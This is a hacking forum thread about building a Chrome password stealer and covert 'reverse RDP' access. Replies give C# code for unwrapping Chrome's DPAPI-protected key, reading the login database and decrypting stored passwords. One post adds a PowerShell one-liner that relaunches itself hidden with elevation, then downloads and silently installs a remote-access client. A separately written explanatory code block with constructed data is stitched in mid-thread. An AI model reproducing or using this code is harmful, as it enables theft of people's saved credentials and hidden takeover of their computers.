
Does anyone know how to do RDP and how to work with DPAPI?

Tr0jan_Horse (RAID array, User)
Registered: 21.05.2023
Posts: 88
Reactions: 27
Greetings. I'm interested in how to write an RDP connection in C#. I also tried to decrypt the passwords in the new Chrome versions and got nothing at all. I'd like to hear your opinion on how you would organize reverse RDP and Chrome password decryption after the update. If there are already articles and you share the source, I'd be grateful. Have a good day, everyone!
 
hello,
Before asking here, better google (not advertising)... I see there is a lot of stuff to learn on Google rather than asking the forum.

On the forum, come with something like "I have done this and am still getting an error"; it will be simpler for people to help you.
Thanks for the reply, but the thing is, I've more or less figured out RDP; it's DPAPI where Google updated the protection, and the information you could google has lost its relevance.
Hi, in Chrome after version 80 the Local State file holds an AES-GCM-256 key (protected by DPAPI); with it you can decrypt all the data from Chrome's DB. There are plenty of examples on GitHub.
Chrome is already at version 119 now; how relevant will those examples be?
Starting from Chrome version 80 the encryption hasn't changed.
Oh, Lumma, my respects!
Thanks for the reply. It's interesting; I just heard that they patch almost every week, so it wasn't clear.


Chromium's source code is open... it is kind of a nightmare to find things there, but it is all there...
Chrome has very few changes from the Chromium source code, so we can't be sure, but the password encryption used to store things in the SQLite database inside the user's directory is not something they change...

C++:
bool OSCryptImpl::EncryptString(const std::string& plaintext,
                                std::string* ciphertext) {
  if (use_legacy_)
    return EncryptStringWithDPAPI(plaintext, ciphertext);

  crypto::Aead aead(crypto::Aead::AES_256_GCM);

  const auto key = GetRawEncryptionKey();
  aead.Init(&key);

  // Note: can only check these once AEAD is initialized.
  DCHECK_EQ(kKeyLength, aead.KeyLength());
  DCHECK_EQ(kNonceLength, aead.NonceLength());

  // Fresh random nonce per record; kNonceLength is 12 bytes for AES-256-GCM.
  std::string nonce;
  crypto::RandBytes(base::WriteInto(&nonce, kNonceLength + 1), kNonceLength);

  // Seal with empty associated data; the GCM tag is appended to the ciphertext.
  if (!aead.Seal(plaintext, nonce, std::string(), ciphertext))
    return false;

  // Final layout: kEncryptionVersionPrefix ("v10") || nonce || ciphertext || tag.
  ciphertext->insert(0, nonce);
  ciphertext->insert(0, kEncryptionVersionPrefix);
  return true;
}

maybe this code can get you started...

C#:
using System;
using System.Text;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Engines;
using Org.BouncyCastle.Crypto.Modes;
using Org.BouncyCastle.Crypto.Parameters;

class GcmAeadDecryptor
{
    public static void Main()
    {
        try
        {
            // Replace these with your actual values.
            // For a Chrome record: key = the 32-byte key from Local State, nonce = the 12 bytes
            // after the "v10" prefix, ciphertext = everything after the nonce INCLUDING the
            // trailing 16-byte GCM tag (BouncyCastle expects the tag appended to the ciphertext).
            byte[] key = Encoding.UTF8.GetBytes("YourEncryptionKey");
            byte[] nonce = Encoding.UTF8.GetBytes("YourNonce");
            byte[] ciphertext = Convert.FromBase64String("YourBase64EncodedCipherText");
            byte[] associatedData = Array.Empty<byte>(); // Chrome seals with empty AD (std::string() above)

            byte[] decryptedData = DecryptGcmAead(key, nonce, ciphertext, associatedData);

            Console.WriteLine("Decrypted Data: " + Encoding.UTF8.GetString(decryptedData));
        }
        catch (InvalidCipherTextException)
        {
            // Tag verification failed: wrong key, wrong nonce, or the blob was modified.
            Console.WriteLine("Error: GCM tag mismatch");
        }
        catch (Exception ex)
        {
            Console.WriteLine("Error: " + ex.Message);
        }
    }

    static byte[] DecryptGcmAead(byte[] key, byte[] nonce, byte[] ciphertext, byte[] associatedData)
    {
        GcmBlockCipher cipher = new GcmBlockCipher(new AesEngine());
        KeyParameter keyParam = new KeyParameter(key);
        ParametersWithIV parameters = new ParametersWithIV(keyParam, nonce); // default 128-bit tag

        cipher.Init(false, parameters); // false = decrypt

        // Set the associated data (must match what was used when sealing)
        if (associatedData != null && associatedData.Length > 0)
        {
            cipher.ProcessAadBytes(associatedData, 0, associatedData.Length);
        }

        // Decrypt the ciphertext; GetOutputSize already excludes the tag in decrypt mode
        byte[] decrypted = new byte[cipher.GetOutputSize(ciphertext.Length)];
        int len = cipher.ProcessBytes(ciphertext, 0, ciphertext.Length, decrypted, 0);
        len += cipher.DoFinal(decrypted, len); // verifies the tag; throws InvalidCipherTextException on mismatch
        Array.Resize(ref decrypted, len);

        return decrypted;
    }
}

on Windows, the "master key" is stored encrypted inside the Local State file (%LOCALAPPDATA%\Google\Chrome\User Data\Local State)
you decrypt it using CryptUnprotectData from the Win32 crypt API

C#:
using System;
using System.Runtime.InteropServices;
using System.Text;

class Program
{
    [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool CryptProtectData(
        ref DATA_BLOB pDataIn,
        string szDataDescr,
        ref DATA_BLOB pOptionalEntropy,
        IntPtr pvReserved,
        ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
        int dwFlags,
        ref DATA_BLOB pDataOut
    );

    [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool CryptUnprotectData(
        ref DATA_BLOB pDataIn,
        IntPtr ppszDataDescr,   // optional LPWSTR* out-param; pass IntPtr.Zero if the description is not needed
        ref DATA_BLOB pOptionalEntropy,
        IntPtr pvReserved,
        ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
        int dwFlags,
        ref DATA_BLOB pDataOut
    );

    // Output blobs from CryptProtectData/CryptUnprotectData are LocalAlloc'd and must be released with LocalFree
    [DllImport("Kernel32.dll", SetLastError = true)]
    public static extern IntPtr LocalFree(IntPtr hMem);

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct DATA_BLOB
    {
        public int cbData;
        public IntPtr pbData;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CRYPTPROTECT_PROMPTSTRUCT
    {
        public int cbSize;
        public int dwPromptFlags;
        public IntPtr hwndApp;
        public string szPrompt;
    }

    static void Main()
    {
        string originalData = "SecretData123";
        byte[] plain = Encoding.Unicode.GetBytes(originalData);

        // Input blob: the plaintext bytes live in unmanaged memory that we allocate and free ourselves
        DATA_BLOB dataIn = new DATA_BLOB
        {
            cbData = plain.Length,
            pbData = Marshal.AllocHGlobal(plain.Length)
        };
        Marshal.Copy(plain, 0, dataIn.pbData, plain.Length);

        DATA_BLOB dataOut = new DATA_BLOB();
        DATA_BLOB entropy = new DATA_BLOB(); // empty blob = no optional entropy

        CRYPTPROTECT_PROMPTSTRUCT prompt = new CRYPTPROTECT_PROMPTSTRUCT
        {
            cbSize = Marshal.SizeOf(typeof(CRYPTPROTECT_PROMPTSTRUCT)),
            dwPromptFlags = 0,
            hwndApp = IntPtr.Zero,
            szPrompt = null
        };

        try
        {
            // Encrypt data (bound to the current user's DPAPI master key)
            if (!CryptProtectData(ref dataIn, "example", ref entropy, IntPtr.Zero, ref prompt, 0, ref dataOut))
            {
                Console.WriteLine("Error encrypting data. Error code: " + Marshal.GetLastWin32Error());
                return;
            }
            Console.WriteLine("Data encrypted successfully (" + dataOut.cbData + " bytes).");

            // Decrypt data; only works in the same user context (or with that user's master key)
            DATA_BLOB decryptedData = new DATA_BLOB();
            if (!CryptUnprotectData(ref dataOut, IntPtr.Zero, ref entropy, IntPtr.Zero, ref prompt, 0, ref decryptedData))
            {
                Console.WriteLine("Error decrypting data. Error code: " + Marshal.GetLastWin32Error());
                return;
            }

            // The output is not NUL-terminated: copy exactly cbData bytes rather than PtrToStringUni(ptr)
            byte[] decryptedBytes = new byte[decryptedData.cbData];
            Marshal.Copy(decryptedData.pbData, decryptedBytes, 0, decryptedBytes.Length);
            Console.WriteLine("Decrypted Data: " + Encoding.Unicode.GetString(decryptedBytes));
            LocalFree(decryptedData.pbData);
        }
        finally
        {
            if (dataOut.pbData != IntPtr.Zero) LocalFree(dataOut.pbData);
            Marshal.FreeHGlobal(dataIn.pbData);
        }
    }
}

and for the sqlite..

C#:
using System;
using System.Data.SQLite;
using System.IO;

class Program
{
    static void Main()
    {
        string connectionString = "Data Source=your_database_file.db;Version=3;";

        using (SQLiteConnection connection = new SQLiteConnection(connectionString))
        {
            connection.Open();

            // Example: Reading a BLOB column
            string query = "SELECT ID, BinaryDataColumn FROM YourTableName;";

            using (SQLiteCommand command = new SQLiteCommand(query, connection))
            {
                using (SQLiteDataReader reader = command.ExecuteReader())
                {
                    while (reader.Read())
                    {
                        int id = reader.GetInt32(reader.GetOrdinal("ID"));
                        byte[] binaryData = GetBytes(reader, "BinaryDataColumn");

                        Console.WriteLine($"ID: {id}, BinaryData Length: {binaryData.Length}");
                       
                        // The blob is ciphertext, not text: decoding it as UTF-8 gives garbage.
                        // Keep the raw bytes and hand them to the AES-GCM decryptor; here we only
                        // show the first bytes (the version prefix) as hex.
                        Console.WriteLine($"Leading bytes: {BitConverter.ToString(binaryData, 0, Math.Min(3, binaryData.Length))}");
                    }
                }
            }
        }
    }

    // Helper method to safely read a BLOB column
    static byte[] GetBytes(SQLiteDataReader reader, string columnName)
    {
        const int CHUNK_SIZE = 2 * 1024; // 2 KB chunks

        long bytesRead;
        long fieldOffset = 0;
        byte[] buffer = new byte[CHUNK_SIZE];
        using (MemoryStream stream = new MemoryStream())
        {
            while ((bytesRead = reader.GetBytes(reader.GetOrdinal(columnName), fieldOffset, buffer, 0, buffer.Length)) > 0)
            {
                stream.Write(buffer, 0, (int)bytesRead);
                fieldOffset += bytesRead;
            }
            return stream.ToArray();
        }
    }
}

mix the ingredients and start doing some experiments...

let us know what you got done ... good luck

ps: the blob inside the sqlite database has the following layout:

VERSION + NONCE + ENCRYPTED_DATA

version will be the characters "v10" (it seems it can be v11, but honestly I just skipped the first 3 bytes and it has worked so far...)
NONCE = 12 RANDOM BYTES

and the encrypted_data is the data you want to decrypt...

you get the bytes (consider 0-indexed) from 3 (included) to 15 (not included) and then from 15 (included) to the end...
the first part is your nonce and the rest is the encrypted_data...

the key you got from the Local State, decrypted with CryptUnprotectData... feed everything to the aes_gcm_decryptor(nonce, key, data)..
 
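The layout described in the post above, as an added worked example that is not part of any post in this thread: it constructs a random 32-byte key and a plaintext of its own, seals them into a "v10" blob the way the EncryptString snippet does (prefix, 12-byte nonce, ciphertext, and the 16-byte GCM tag at the end, which the post's offsets silently include in "encrypted_data"), then slices the blob at offsets 3 and 15 and decrypts it, and shows that a single flipped tag bit is rejected instead of producing garbage. It also covers the Local State side: Chrome keeps the wrapped key at os_crypt.encrypted_key as base64 of the ASCII prefix "DPAPI" followed by the CryptProtectData blob (that key name and prefix come from Chromium's os_crypt_win.cc, not from the post). The Local State part runs only on Windows and only round-trips a key this program wrapped itself; it assumes .NET 8 with the System.Security.Cryptography.ProtectedData package. Nothing here reads a real browser profile.

```csharp
// Added example (not from the original post). Assumes .NET 8 and the
// System.Security.Cryptography.ProtectedData package; all inputs are constructed here.
using System;
using System.Linq;
using System.Runtime.Versioning;
using System.Security.Cryptography;
using System.Text;
using System.Text.Json;

static class ChromeV10Blob
{
    // Constants mirror os_crypt_win.cc: "v10" prefix, 12-byte nonce, 16-byte GCM tag.
    const int NonceLength = 12;
    const int TagLength = 16;
    static readonly byte[] VersionPrefix = Encoding.ASCII.GetBytes("v10");
    static readonly byte[] DpapiPrefix = Encoding.ASCII.GetBytes("DPAPI");

    // Same shape as OSCryptImpl::EncryptString: prefix || nonce || ciphertext || tag, empty AD.
    public static byte[] Seal(byte[] key, byte[] plaintext)
    {
        byte[] nonce = RandomNumberGenerator.GetBytes(NonceLength);
        byte[] ciphertext = new byte[plaintext.Length];
        byte[] tag = new byte[TagLength];
        using var aes = new AesGcm(key, TagLength);
        aes.Encrypt(nonce, plaintext, ciphertext, tag);
        return VersionPrefix.Concat(nonce).Concat(ciphertext).Concat(tag).ToArray();
    }

    // Parses the layout from the post: [0,3) prefix, [3,15) nonce, [15,end) ciphertext+tag.
    public static byte[] Open(byte[] key, byte[] blob)
    {
        if (blob.Length < VersionPrefix.Length + NonceLength + TagLength)
            throw new CryptographicException("blob too short for prefix + nonce + tag");
        if (!blob.AsSpan(0, VersionPrefix.Length).SequenceEqual(VersionPrefix))
            throw new CryptographicException("unexpected prefix; not a v10 AES-GCM blob");

        ReadOnlySpan<byte> nonce = blob.AsSpan(VersionPrefix.Length, NonceLength);
        ReadOnlySpan<byte> body = blob.AsSpan(VersionPrefix.Length + NonceLength);
        ReadOnlySpan<byte> ciphertext = body[..^TagLength];
        ReadOnlySpan<byte> tag = body[^TagLength..];

        byte[] plaintext = new byte[ciphertext.Length];
        using var aes = new AesGcm(key, TagLength);
        aes.Decrypt(nonce, ciphertext, tag, plaintext); // throws on tag mismatch: wrong key or tampered blob
        return plaintext;
    }

    // Local State keeps the key at os_crypt.encrypted_key = base64("DPAPI" + CryptProtectData blob).
    // Windows only; the DPAPI blob unwraps only in the user context that produced it.
    [SupportedOSPlatform("windows")]
    public static byte[] KeyFromLocalState(string localStateJson)
    {
        using JsonDocument doc = JsonDocument.Parse(localStateJson);
        string b64 = doc.RootElement.GetProperty("os_crypt").GetProperty("encrypted_key").GetString()
                     ?? throw new FormatException("encrypted_key missing");
        byte[] wrapped = Convert.FromBase64String(b64);
        if (wrapped.Length < DpapiPrefix.Length || !wrapped.AsSpan(0, DpapiPrefix.Length).SequenceEqual(DpapiPrefix))
            throw new CryptographicException("encrypted_key does not start with DPAPI");
        return ProtectedData.Unprotect(wrapped[DpapiPrefix.Length..], null, DataProtectionScope.CurrentUser);
    }

    static void Main()
    {
        byte[] key = RandomNumberGenerator.GetBytes(32);              // constructed key, not a profile's
        byte[] blob = Seal(key, Encoding.UTF8.GetBytes("hunter2"));    // constructed plaintext
        Console.WriteLine($"prefix={Encoding.ASCII.GetString(blob, 0, 3)} total={blob.Length} bytes"); // 3+12+7+16
        Console.WriteLine("opened: " + Encoding.UTF8.GetString(Open(key, blob)));

        byte[] tampered = (byte[])blob.Clone();
        tampered[^1] ^= 0x01;                                         // flip one bit of the tag
        try { Open(key, tampered); }
        catch (CryptographicException) { Console.WriteLine("tampered blob rejected by GCM tag check"); }

        if (OperatingSystem.IsWindows())
        {
            // Constructed Local State: wrap our own key the way Chrome wraps its real one.
            byte[] wrapped = ProtectedData.Protect(key, null, DataProtectionScope.CurrentUser);
            string localState = JsonSerializer.Serialize(new
            {
                os_crypt = new { encrypted_key = Convert.ToBase64String(DpapiPrefix.Concat(wrapped).ToArray()) }
            });
            bool same = KeyFromLocalState(localState).AsSpan().SequenceEqual(key);
            Console.WriteLine("key recovered from Local State: " + same);
        }
    }
}
```

The tag handling is the part worth noticing: GCM is an authenticated mode, so a decryptor that is given the wrong key, the wrong nonce offset, or a blob that was edited in the database does not return wrong bytes, it refuses. If a port of the BouncyCastle code above "decrypts" to nothing or throws at DoFinal, check the slicing before suspecting the key.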
I don't mean to flood or stray off-topic, but I think you would save a lot of headache by using some client that can silently install and that comes with the benefit of being code-signed. Once you have remote, you can have direct access to local Chrome AppData logins, network cookies, and so on. It can easily be done from interactive shells as well.

I love your signature, btw...

what kind of client would be code-signed? I think I am not so far ahead of the curve; please shed some light for us.
 
Code:
$downloadUrl = "https://deskroll.com/download/win/gtc/DeskRollSetup.exe"; $savePath = "C:\ProgramData\DeskRollSetup.exe"; $wc = New-Object System.Net.WebClient; try { Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs -WindowStyle Hidden; $wc.DownloadFile($downloadUrl, $savePath); Write-Host "File downloaded successfully." } catch { Write-Host "An error occurred while downloading the file: $_" } finally { $wc.Dispose() }
Code:
cd c:\programdata; ./DeskRollSetup.exe /S --link_token=yourlinktokenhere
 
recently stumbled upon a signed xvfb driver as well; if you're interested I will share that too, although I have not had time to test it

EDIT: Should have noted *for Windows*, since that would be nothing spectacular in and of itself for nix boxes
sure, please share... but wait... that would be like gold... right!?

I noted something
The infrastructure for DeskRoll backend is located in the United States. Our R&D office for DeskRoll is in Tomsk, Russia (GMT +7) so we mainly answer phone calls in that time zone.

I just love Russian community... so amazing...
 
https://www.amyuni[.]com/forum/viewtopic.php?p=9545&hilit=display+adapter#p9545 Pretty sure I found it somewhere in here. Leaving the resource instead of a download link since it might be a bit negligent to do so without testing first!
EDIT:
https://github.com/M2Team/NanaRun if you're working with patching that requires trustedinstaller privs =)
 

